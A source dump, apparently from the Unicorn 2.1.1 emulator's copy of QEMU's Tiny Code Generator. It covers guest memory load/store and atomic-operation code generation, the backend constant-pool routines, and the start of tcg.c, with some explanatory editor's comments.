hi, arg, 32); } /* QEMU specific operations. */ void tcg_gen_exit_tb(TCGContext *tcg_ctx, TranslationBlock *tb, unsigned idx) { uintptr_t val = (uintptr_t)tb + idx; if (tb == NULL) { tcg_debug_assert(idx == 0); } else if (idx <= TB_EXIT_IDXMAX) { #ifdef CONFIG_DEBUG_TCG /* This is an exit following a goto_tb. Verify that we have seen this numbered exit before, via tcg_gen_goto_tb. */ tcg_debug_assert(tcg_ctx->goto_tb_issue_mask & (1 << idx)); #endif /* When not chaining, exit without indicating a link. */ //if (qemu_loglevel_mask(CPU_LOG_TB_NOCHAIN)) { // val = 0; //} } else { /* This is an exit via the exitreq label. */ tcg_debug_assert(idx == TB_EXIT_REQUESTED); } tcg_gen_op1i(tcg_ctx, INDEX_op_exit_tb, val); } void tcg_gen_goto_tb(TCGContext *tcg_ctx, unsigned idx) { /* We only support two chained exits. */ tcg_debug_assert(idx <= TB_EXIT_IDXMAX); #ifdef CONFIG_DEBUG_TCG /* Verify that we haven't seen this numbered exit before. */ tcg_debug_assert((tcg_ctx->goto_tb_issue_mask & (1 << idx)) == 0); tcg_ctx->goto_tb_issue_mask |= 1 << idx; #endif /* When not chaining, we simply fall through to the "fallback" exit. */ // if (!qemu_loglevel_mask(CPU_LOG_TB_NOCHAIN)) tcg_gen_op1i(tcg_ctx, INDEX_op_goto_tb, idx); } void tcg_gen_lookup_and_goto_ptr(TCGContext *tcg_ctx) { #if TCG_TARGET_HAS_goto_ptr TCGv_ptr ptr; ptr = tcg_temp_new_ptr(tcg_ctx); gen_helper_lookup_tb_ptr(tcg_ctx, ptr, tcg_ctx->cpu_env); tcg_gen_op1i(tcg_ctx, INDEX_op_goto_ptr, tcgv_ptr_arg(tcg_ctx, ptr)); tcg_temp_free_ptr(tcg_ctx, ptr); #else tcg_gen_exit_tb(tcg_ctx, NULL, 0); #endif } static inline MemOp tcg_canonicalize_memop(MemOp op, bool is64, bool st) { /* Trigger the asserts within as early as possible. 
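 * Editor's note (illustrative): the canonicalization below drops flag
 * bits that cannot matter for the given access -- byte accesses have no
 * byte order (MO_BSWAP cleared), a 32-bit destination cannot observe
 * sign extension of a 32-bit value (MO_SIGN cleared when !is64), and
 * stores never sign-extend at all.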
*/ (void)get_alignment_bits(op); switch (op & MO_SIZE) { case MO_8: op &= ~MO_BSWAP; break; case MO_16: break; case MO_32: if (!is64) { op &= ~MO_SIGN; } break; case MO_64: if (!is64) { tcg_abort(); } break; } if (st) { op &= ~MO_SIGN; } return op; } static void gen_ldst_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 val, TCGv addr, MemOp memop, TCGArg idx) { TCGMemOpIdx oi = make_memop_idx(memop, idx); #if TARGET_LONG_BITS == 32 tcg_gen_op3i_i32(tcg_ctx, opc, val, addr, oi); #else #if TCG_TARGET_REG_BITS == 32 tcg_gen_op4i_i32(tcg_ctx, opc, val, TCGV_LOW(tcg_ctx, addr), TCGV_HIGH(tcg_ctx, addr), oi); #else tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, val), tcgv_i64_arg(tcg_ctx, addr), oi); #endif #endif } static void gen_ldst_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 val, TCGv addr, MemOp memop, TCGArg idx) { TCGMemOpIdx oi = make_memop_idx(memop, idx); #if TARGET_LONG_BITS == 32 #if TCG_TARGET_REG_BITS == 32 tcg_gen_op4i_i32(tcg_ctx, opc, TCGV_LOW(tcg_ctx, val), TCGV_HIGH(tcg_ctx, val), addr, oi); #else tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, val), tcgv_i32_arg(tcg_ctx, addr), oi); #endif #else #if TCG_TARGET_REG_BITS == 32 tcg_gen_op5i_i32(tcg_ctx, opc, TCGV_LOW(tcg_ctx, val), TCGV_HIGH(tcg_ctx, val), TCGV_LOW(tcg_ctx, addr), TCGV_HIGH(tcg_ctx, addr), oi); #else tcg_gen_op3i_i64(tcg_ctx, opc, val, addr, oi); #endif #endif } // Unicorn engine // check if the last memory access was invalid // if so, we jump to the block epilogue to quit immediately. void check_exit_request(TCGContext *tcg_ctx) { TCGv_i32 count; // Unicorn: // For an ARM IT block, we can't exit in the middle of the // block, and this is our hack here. if (tcg_ctx->uc->no_exit_request) { return; } count = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, count, tcg_ctx->cpu_env, offsetof(ArchCPU, neg.icount_decr.u32) - offsetof(ArchCPU, env)); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, count, 0, tcg_ctx->exitreq_label); tcg_temp_free_i32(tcg_ctx, count); } static void tcg_gen_req_mo(TCGContext *tcg_ctx, TCGBar type) { #ifdef TCG_GUEST_DEFAULT_MO type &= TCG_GUEST_DEFAULT_MO; #endif type &= ~TCG_TARGET_DEFAULT_MO; if (type) { tcg_gen_mb(tcg_ctx, type | TCG_BAR_SC); } } void tcg_gen_qemu_ld_i32(TCGContext *tcg_ctx, TCGv_i32 val, TCGv addr, TCGArg idx, MemOp memop) { MemOp orig_memop; tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_LD | TCG_MO_ST_LD); memop = tcg_canonicalize_memop(memop, 0, 0); orig_memop = memop; if (!TCG_TARGET_HAS_MEMORY_BSWAP && (memop & MO_BSWAP)) { memop &= ~MO_BSWAP; /* The bswap primitive requires zero-extended input. 
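 * Editor's note (illustrative): e.g. a signed big-endian 16-bit load on
 * a host without TCG_TARGET_HAS_MEMORY_BSWAP becomes: a zero-extending
 * load (MO_SIGN dropped), bswap16 -- which assumes bits 16..31 are
 * already zero -- then ext16s to reinstate the sign, which is exactly
 * the sequence emitted below.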
*/ if ((memop & MO_SSIZE) == MO_SW) { memop &= ~MO_SIGN; } } gen_ldst_i32(tcg_ctx, INDEX_op_qemu_ld_i32, val, addr, memop, idx); if ((orig_memop ^ memop) & MO_BSWAP) { switch (orig_memop & MO_SIZE) { case MO_16: tcg_gen_bswap16_i32(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext16s_i32(tcg_ctx, val, val); } break; case MO_32: tcg_gen_bswap32_i32(tcg_ctx, val, val); break; default: g_assert_not_reached(); } } check_exit_request(tcg_ctx); } void tcg_gen_qemu_st_i32(TCGContext *tcg_ctx, TCGv_i32 val, TCGv addr, TCGArg idx, MemOp memop) { TCGv_i32 swap = NULL; tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_ST | TCG_MO_ST_ST); memop = tcg_canonicalize_memop(memop, 0, 1); #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { swap = tcg_temp_new_i32(tcg_ctx); switch (memop & MO_SIZE) { case MO_16: tcg_gen_ext16u_i32(tcg_ctx, swap, val); tcg_gen_bswap16_i32(tcg_ctx, swap, swap); break; case MO_32: tcg_gen_bswap32_i32(tcg_ctx, swap, val); break; default: g_assert_not_reached(); } val = swap; memop &= ~MO_BSWAP; } #endif gen_ldst_i32(tcg_ctx, INDEX_op_qemu_st_i32, val, addr, memop, idx); if (swap) { tcg_temp_free_i32(tcg_ctx, swap); } check_exit_request(tcg_ctx); } void tcg_gen_qemu_ld_i64(TCGContext *tcg_ctx, TCGv_i64 val, TCGv addr, TCGArg idx, MemOp memop) { MemOp orig_memop; #if TCG_TARGET_REG_BITS == 32 if ((memop & MO_SIZE) < MO_64) { tcg_gen_qemu_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, val), addr, idx, memop); if (memop & MO_SIGN) { tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, val), TCGV_LOW(tcg_ctx, val), 31); } else { tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, val), 0); } check_exit_request(tcg_ctx); return; } #endif tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_LD | TCG_MO_ST_LD); memop = tcg_canonicalize_memop(memop, 1, 0); orig_memop = memop; #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { memop &= ~MO_BSWAP; /* The bswap primitive requires zero-extended input. 
*/ if ((memop & MO_SIGN) && (memop & MO_SIZE) < MO_64) { memop &= ~MO_SIGN; } } #endif gen_ldst_i64(tcg_ctx, INDEX_op_qemu_ld_i64, val, addr, memop, idx); if ((orig_memop ^ memop) & MO_BSWAP) { switch (orig_memop & MO_SIZE) { case MO_16: tcg_gen_bswap16_i64(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext16s_i64(tcg_ctx, val, val); } break; case MO_32: tcg_gen_bswap32_i64(tcg_ctx, val, val); if (orig_memop & MO_SIGN) { tcg_gen_ext32s_i64(tcg_ctx, val, val); } break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, val, val); break; default: g_assert_not_reached(); } } check_exit_request(tcg_ctx); } void tcg_gen_qemu_st_i64(TCGContext *tcg_ctx, TCGv_i64 val, TCGv addr, TCGArg idx, MemOp memop) { TCGv_i64 swap = NULL; #if TCG_TARGET_REG_BITS == 32 if ((memop & MO_SIZE) < MO_64) { tcg_gen_qemu_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, val), addr, idx, memop); check_exit_request(tcg_ctx); return; } #endif tcg_gen_req_mo(tcg_ctx, TCG_MO_LD_ST | TCG_MO_ST_ST); memop = tcg_canonicalize_memop(memop, 1, 1); #if !TCG_TARGET_HAS_MEMORY_BSWAP if (memop & MO_BSWAP) { swap = tcg_temp_new_i64(tcg_ctx); switch (memop & MO_SIZE) { case MO_16: tcg_gen_ext16u_i64(tcg_ctx, swap, val); tcg_gen_bswap16_i64(tcg_ctx, swap, swap); break; case MO_32: tcg_gen_ext32u_i64(tcg_ctx, swap, val); tcg_gen_bswap32_i64(tcg_ctx, swap, swap); break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, swap, val); break; default: g_assert_not_reached(); } val = swap; memop &= ~MO_BSWAP; } #endif gen_ldst_i64(tcg_ctx, INDEX_op_qemu_st_i64, val, addr, memop, idx); if (swap) { tcg_temp_free_i64(tcg_ctx, swap); } check_exit_request(tcg_ctx); } static void tcg_gen_ext_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 val, MemOp opc) { switch (opc & MO_SSIZE) { case MO_SB: tcg_gen_ext8s_i32(tcg_ctx, ret, val); break; case MO_UB: tcg_gen_ext8u_i32(tcg_ctx, ret, val); break; case MO_SW: tcg_gen_ext16s_i32(tcg_ctx, ret, val); break; case MO_UW: tcg_gen_ext16u_i32(tcg_ctx, ret, val); break; default: tcg_gen_mov_i32(tcg_ctx, ret, val); break; } } static void tcg_gen_ext_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 val, MemOp opc) { switch (opc & MO_SSIZE) { case MO_SB: tcg_gen_ext8s_i64(tcg_ctx, ret, val); break; case MO_UB: tcg_gen_ext8u_i64(tcg_ctx, ret, val); break; case MO_SW: tcg_gen_ext16s_i64(tcg_ctx, ret, val); break; case MO_UW: tcg_gen_ext16u_i64(tcg_ctx, ret, val); break; case MO_SL: tcg_gen_ext32s_i64(tcg_ctx, ret, val); break; case MO_UL: tcg_gen_ext32u_i64(tcg_ctx, ret, val); break; default: tcg_gen_mov_i64(tcg_ctx, ret, val); break; } } typedef void (*gen_atomic_cx_i32)(TCGContext *tcg_ctx, TCGv_i32, TCGv_env, TCGv, TCGv_i32, TCGv_i32, TCGv_i32); typedef void (*gen_atomic_cx_i64)(TCGContext *tcg_ctx, TCGv_i64, TCGv_env, TCGv, TCGv_i64, TCGv_i64, TCGv_i32); typedef void (*gen_atomic_op_i32)(TCGContext *tcg_ctx, TCGv_i32, TCGv_env, TCGv, TCGv_i32, TCGv_i32); typedef void (*gen_atomic_op_i64)(TCGContext *tcg_ctx, TCGv_i64, TCGv_env, TCGv, TCGv_i64, TCGv_i32); #ifdef CONFIG_ATOMIC64 # define WITH_ATOMIC64(X) X, #else # define WITH_ATOMIC64(X) #endif static void * const table_cmpxchg[16] = { [MO_8] = gen_helper_atomic_cmpxchgb, [MO_16 | MO_LE] = gen_helper_atomic_cmpxchgw_le, [MO_16 | MO_BE] = gen_helper_atomic_cmpxchgw_be, [MO_32 | MO_LE] = gen_helper_atomic_cmpxchgl_le, [MO_32 | MO_BE] = gen_helper_atomic_cmpxchgl_be, WITH_ATOMIC64([MO_64 | MO_LE] = gen_helper_atomic_cmpxchgq_le) WITH_ATOMIC64([MO_64 | MO_BE] = gen_helper_atomic_cmpxchgq_be) }; void tcg_gen_atomic_cmpxchg_i32(TCGContext *tcg_ctx, TCGv_i32 retv, TCGv addr, TCGv_i32 cmpv, 
TCGv_i32 newv, TCGArg idx, MemOp memop) { memop = tcg_canonicalize_memop(memop, 0, 0); if (!(tcg_ctx->tb_cflags & CF_PARALLEL)) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext_i32(tcg_ctx, t2, cmpv, memop & MO_SIZE); tcg_gen_qemu_ld_i32(tcg_ctx, t1, addr, idx, memop & ~MO_SIGN); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, t2, t1, t2, newv, t1); tcg_gen_qemu_st_i32(tcg_ctx, t2, addr, idx, memop); tcg_temp_free_i32(tcg_ctx, t2); if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, retv, t1, memop); } else { tcg_gen_mov_i32(tcg_ctx, retv, t1); } tcg_temp_free_i32(tcg_ctx, t1); } else { gen_atomic_cx_i32 gen; gen = table_cmpxchg[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, retv, tcg_ctx->cpu_env, addr, cmpv, newv, oi); tcg_temp_free_i32(tcg_ctx, oi); } if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, retv, retv, memop); } } } void tcg_gen_atomic_cmpxchg_i64(TCGContext *tcg_ctx, TCGv_i64 retv, TCGv addr, TCGv_i64 cmpv, TCGv_i64 newv, TCGArg idx, MemOp memop) { memop = tcg_canonicalize_memop(memop, 1, 0); if (!(tcg_ctx->tb_cflags & CF_PARALLEL)) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i64(tcg_ctx, t2, cmpv, memop & MO_SIZE); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, idx, memop & ~MO_SIGN); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t2, t1, t2, newv, t1); tcg_gen_qemu_st_i64(tcg_ctx, t2, addr, idx, memop); tcg_temp_free_i64(tcg_ctx, t2); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, retv, t1, memop); } else { tcg_gen_mov_i64(tcg_ctx, retv, t1); } tcg_temp_free_i64(tcg_ctx, t1); } else if ((memop & MO_SIZE) == MO_64) { #ifdef CONFIG_ATOMIC64 gen_atomic_cx_i64 gen; gen = table_cmpxchg[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop, idx)); gen(tcg_ctx, retv, tcg_ctx->cpu_env, addr, cmpv, newv, oi); tcg_temp_free_i32(tcg_ctx, oi); } #else gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); /* Produce a result, so that we have a well-formed opcode stream with respect to uses of the result in the (dead) code following. */ tcg_gen_movi_i64(tcg_ctx, retv, 0); #endif /* CONFIG_ATOMIC64 */ } else { TCGv_i32 c32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 n32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 r32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c32, cmpv); tcg_gen_extrl_i64_i32(tcg_ctx, n32, newv); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, r32, addr, c32, n32, idx, memop & ~MO_SIGN); tcg_temp_free_i32(tcg_ctx, c32); tcg_temp_free_i32(tcg_ctx, n32); tcg_gen_extu_i32_i64(tcg_ctx, retv, r32); tcg_temp_free_i32(tcg_ctx, r32); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, retv, retv, memop); } } } static void do_nonatomic_op_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop, bool new_val, void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); memop = tcg_canonicalize_memop(memop, 0, 0); tcg_gen_qemu_ld_i32(tcg_ctx, t1, addr, idx, memop); tcg_gen_ext_i32(tcg_ctx, t2, val, memop); gen(tcg_ctx, t2, t1, t2); tcg_gen_qemu_st_i32(tcg_ctx, t2, addr, idx, memop); tcg_gen_ext_i32(tcg_ctx, ret, (new_val ? 
t2 : t1), memop); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } static void do_atomic_op_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop, void * const table[]) { gen_atomic_op_i32 gen; memop = tcg_canonicalize_memop(memop, 0, 0); gen = table[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, ret, tcg_ctx->cpu_env, addr, val, oi); tcg_temp_free_i32(tcg_ctx, oi); } if (memop & MO_SIGN) { tcg_gen_ext_i32(tcg_ctx, ret, ret, memop); } } static void do_nonatomic_op_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop, bool new_val, void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); memop = tcg_canonicalize_memop(memop, 1, 0); tcg_gen_qemu_ld_i64(tcg_ctx, t1, addr, idx, memop); tcg_gen_ext_i64(tcg_ctx, t2, val, memop); gen(tcg_ctx, t2, t1, t2); tcg_gen_qemu_st_i64(tcg_ctx, t2, addr, idx, memop); tcg_gen_ext_i64(tcg_ctx, ret, (new_val ? t2 : t1), memop); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static void do_atomic_op_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop, void * const table[]) { memop = tcg_canonicalize_memop(memop, 1, 0); if ((memop & MO_SIZE) == MO_64) { #ifdef CONFIG_ATOMIC64 gen_atomic_op_i64 gen; gen = table[memop & (MO_SIZE | MO_BSWAP)]; tcg_debug_assert(gen != NULL); { TCGv_i32 oi = tcg_const_i32(tcg_ctx, make_memop_idx(memop & ~MO_SIGN, idx)); gen(tcg_ctx, ret, tcg_ctx->cpu_env, addr, val, oi); tcg_temp_free_i32(tcg_ctx, oi); } #else gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); /* Produce a result, so that we have a well-formed opcode stream with respect to uses of the result in the (dead) code following. 
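 * Editor's note (illustrative): gen_helper_exit_atomic raises EXCP_ATOMIC
 * and longjmps out of the generated code so the access can be retried
 * under an exclusive section; control never returns here, so the movi
 * below exists only to keep the opcode stream well-formed for liveness
 * analysis, as the comment says.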
*/ tcg_gen_movi_i64(tcg_ctx, ret, 0); #endif /* CONFIG_ATOMIC64 */ } else { TCGv_i32 v32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 r32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, v32, val); do_atomic_op_i32(tcg_ctx, r32, addr, v32, idx, memop & ~MO_SIGN, table); tcg_temp_free_i32(tcg_ctx, v32); tcg_gen_extu_i32_i64(tcg_ctx, ret, r32); tcg_temp_free_i32(tcg_ctx, r32); if (memop & MO_SIGN) { tcg_gen_ext_i64(tcg_ctx, ret, ret, memop); } } } #define GEN_ATOMIC_HELPER(NAME, OP, NEW) \ static void * const table_##NAME[16] = { \ [MO_8] = gen_helper_atomic_##NAME##b, \ [MO_16 | MO_LE] = gen_helper_atomic_##NAME##w_le, \ [MO_16 | MO_BE] = gen_helper_atomic_##NAME##w_be, \ [MO_32 | MO_LE] = gen_helper_atomic_##NAME##l_le, \ [MO_32 | MO_BE] = gen_helper_atomic_##NAME##l_be, \ WITH_ATOMIC64([MO_64 | MO_LE] = gen_helper_atomic_##NAME##q_le) \ WITH_ATOMIC64([MO_64 | MO_BE] = gen_helper_atomic_##NAME##q_be) \ }; \ void tcg_gen_atomic_##NAME##_i32 \ (TCGContext *tcg_ctx, TCGv_i32 ret, TCGv addr, TCGv_i32 val, TCGArg idx, MemOp memop) \ { \ if (tcg_ctx->tb_cflags & CF_PARALLEL) { \ do_atomic_op_i32(tcg_ctx, ret, addr, val, idx, memop, table_##NAME); \ } else { \ do_nonatomic_op_i32(tcg_ctx, ret, addr, val, idx, memop, NEW, \ tcg_gen_##OP##_i32); \ } \ } \ void tcg_gen_atomic_##NAME##_i64 \ (TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, TCGv_i64 val, TCGArg idx, MemOp memop) \ { \ if (tcg_ctx->tb_cflags & CF_PARALLEL) { \ do_atomic_op_i64(tcg_ctx, ret, addr, val, idx, memop, table_##NAME); \ } else { \ do_nonatomic_op_i64(tcg_ctx, ret, addr, val, idx, memop, NEW, \ tcg_gen_##OP##_i64); \ } \ } GEN_ATOMIC_HELPER(fetch_add, add, 0) GEN_ATOMIC_HELPER(fetch_and, and, 0) GEN_ATOMIC_HELPER(fetch_or, or, 0) GEN_ATOMIC_HELPER(fetch_xor, xor, 0) GEN_ATOMIC_HELPER(fetch_smin, smin, 0) GEN_ATOMIC_HELPER(fetch_umin, umin, 0) GEN_ATOMIC_HELPER(fetch_smax, smax, 0) GEN_ATOMIC_HELPER(fetch_umax, umax, 0) GEN_ATOMIC_HELPER(add_fetch, add, 1) GEN_ATOMIC_HELPER(and_fetch, and, 1) GEN_ATOMIC_HELPER(or_fetch, or, 1) GEN_ATOMIC_HELPER(xor_fetch, xor, 1) GEN_ATOMIC_HELPER(smin_fetch, smin, 1) GEN_ATOMIC_HELPER(umin_fetch, umin, 1) GEN_ATOMIC_HELPER(smax_fetch, smax, 1) GEN_ATOMIC_HELPER(umax_fetch, umax, 1) static void tcg_gen_mov2_i32(TCGContext *tcg_ctx, TCGv_i32 r, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mov_i32(tcg_ctx, r, b); } static void tcg_gen_mov2_i64(TCGContext *tcg_ctx, TCGv_i64 r, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mov_i64(tcg_ctx, r, b); } GEN_ATOMIC_HELPER(xchg, mov2, 0) #undef GEN_ATOMIC_HELPER
unicorn-2.1.1/qemu/tcg/tcg-pool.inc.c000066400000000000000000000123411467524106700173710ustar00rootroot00000000000000
/* * TCG Backend Data: constant pool. 
* * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ typedef struct TCGLabelPoolData { struct TCGLabelPoolData *next; tcg_insn_unit *label; intptr_t addend; int rtype; unsigned nlong; tcg_target_ulong data[]; } TCGLabelPoolData; static TCGLabelPoolData *new_pool_alloc(TCGContext *s, int nlong, int rtype, tcg_insn_unit *label, intptr_t addend) { TCGLabelPoolData *n = tcg_malloc(s, sizeof(TCGLabelPoolData) + sizeof(tcg_target_ulong) * nlong); n->label = label; n->addend = addend; n->rtype = rtype; n->nlong = nlong; return n; } static void new_pool_insert(TCGContext *s, TCGLabelPoolData *n) { TCGLabelPoolData *i, **pp; int nlong = n->nlong; /* Insertion sort on the pool. */ for (pp = &s->pool_labels; (i = *pp) != NULL; pp = &i->next) { if (nlong > i->nlong) { break; } if (nlong < i->nlong) { continue; } if (memcmp(n->data, i->data, sizeof(tcg_target_ulong) * nlong) >= 0) { break; } } n->next = *pp; *pp = n; } /* The "usual" for generic integer code. */ static inline void new_pool_label(TCGContext *s, tcg_target_ulong d, int rtype, tcg_insn_unit *label, intptr_t addend) { TCGLabelPoolData *n = new_pool_alloc(s, 1, rtype, label, addend); n->data[0] = d; new_pool_insert(s, n); } /* For v64 or v128, depending on the host. */ static inline void new_pool_l2(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1) { TCGLabelPoolData *n = new_pool_alloc(s, 2, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; new_pool_insert(s, n); } /* For v128 or v256, depending on the host. */ static inline void new_pool_l4(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1, tcg_target_ulong d2, tcg_target_ulong d3) { TCGLabelPoolData *n = new_pool_alloc(s, 4, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; n->data[2] = d2; n->data[3] = d3; new_pool_insert(s, n); } /* For v256, for 32-bit host. */ static inline void new_pool_l8(TCGContext *s, int rtype, tcg_insn_unit *label, intptr_t addend, tcg_target_ulong d0, tcg_target_ulong d1, tcg_target_ulong d2, tcg_target_ulong d3, tcg_target_ulong d4, tcg_target_ulong d5, tcg_target_ulong d6, tcg_target_ulong d7) { TCGLabelPoolData *n = new_pool_alloc(s, 8, rtype, label, addend); n->data[0] = d0; n->data[1] = d1; n->data[2] = d2; n->data[3] = d3; n->data[4] = d4; n->data[5] = d5; n->data[6] = d6; n->data[7] = d7; new_pool_insert(s, n); } /* To be provided by cpu/tcg-target.inc.c. 
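 * Editor's note (illustrative, not part of the original source): the
 * insertion sort in new_pool_insert above keeps wider entries first and
 * equal data adjacent.  Both properties matter in tcg_out_pool_finalize
 * below: the first (widest) entry determines the pool's alignment, and
 * duplicate constants end up next to each other, so each distinct value
 * is emitted once and every later reference is patched to point at the
 * earlier copy.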
*/ static void tcg_out_nop_fill(tcg_insn_unit *p, int count); static int tcg_out_pool_finalize(TCGContext *s) { TCGLabelPoolData *p = s->pool_labels; TCGLabelPoolData *l = NULL; char *a; if (p == NULL) { return 0; } /* ??? Round up to qemu_icache_linesize, but then do not round again when allocating the next TranslationBlock structure. */ a = (void *)ROUND_UP((uintptr_t)s->code_ptr, sizeof(tcg_target_ulong) * p->nlong); tcg_out_nop_fill(s->code_ptr, (tcg_insn_unit *)a - s->code_ptr); s->data_gen_ptr = a; for (; p != NULL; p = p->next) { size_t size = sizeof(tcg_target_ulong) * p->nlong; if (!l || l->nlong != p->nlong || memcmp(l->data, p->data, size)) { if (unlikely(a > (char *)s->code_gen_highwater)) { return -1; } memcpy(a, p->data, size); a += size; l = p; } if (!patch_reloc(p->label, p->rtype, (intptr_t)a - size, p->addend)) { return -2; } } s->code_ptr = (tcg_insn_unit *)a; return 0; }
unicorn-2.1.1/qemu/tcg/tcg.c000066400000000000000000000401441467524106700156550ustar00rootroot00000000000000
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* define it to use liveness analysis (better code) */ #define USE_TCG_OPTIMIZATIONS #include "qemu/osdep.h" /* Define to dump the ELF file used to communicate with GDB. */ #undef DEBUG_JIT #include "qemu/cutils.h" #include "qemu/host-utils.h" #include "qemu/timer.h" #include <glib_compat.h> /* Note: the long term plan is to reduce the dependencies on the QEMU CPU definitions. 
